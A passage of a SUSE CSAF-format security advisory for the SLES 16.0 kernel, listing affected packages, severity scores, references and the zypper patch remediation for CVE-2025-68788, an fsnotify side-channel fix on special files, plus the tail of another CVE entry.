"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68784"
},
{
"cve": "CVE-2025-68788",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68788"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfsnotify: do not generate ACCESS/MODIFY events on child for special files\n\ninotify/fanotify do not allow users with no read access to a file to\nsubscribe to events (e.g. IN_ACCESS/IN_MODIFY), but they do allow the\nsame user to subscribe for watching events on children when the user\nhas access to the parent directory (e.g. /dev).\n\nUsers with no read access to a file but with read access to its parent\ndirectory can still stat the file and see if it was accessed/modified\nvia atime/mtime change.\n\nThe same is not true for special files (e.g. /dev/null). Users will not\ngenerally observe atime/mtime changes when other users read/write to\nspecial files, only when someone sets atime/mtime via utimensat().\n\nAlign fsnotify events with this stat behavior and do not generate\nACCESS/MODIFY events to parent watchers on read/write of special files.\nThe events are still generated to parent watchers on utimensat(). This\ncloses some side-channels that could be possibly used for information\nexfiltration [1].\n\n[1] https://snee.la/pdf/pubs/file-notification-attacks.pdf",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68788",
"url": "https://www.suse.com/security/cve/CVE-2025-68788"
},
{
"category": "external",
"summary": "SUSE Bug 1256638 for CVE-2025-68788",
"url": "https://bugzilla.suse.com/1256638"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
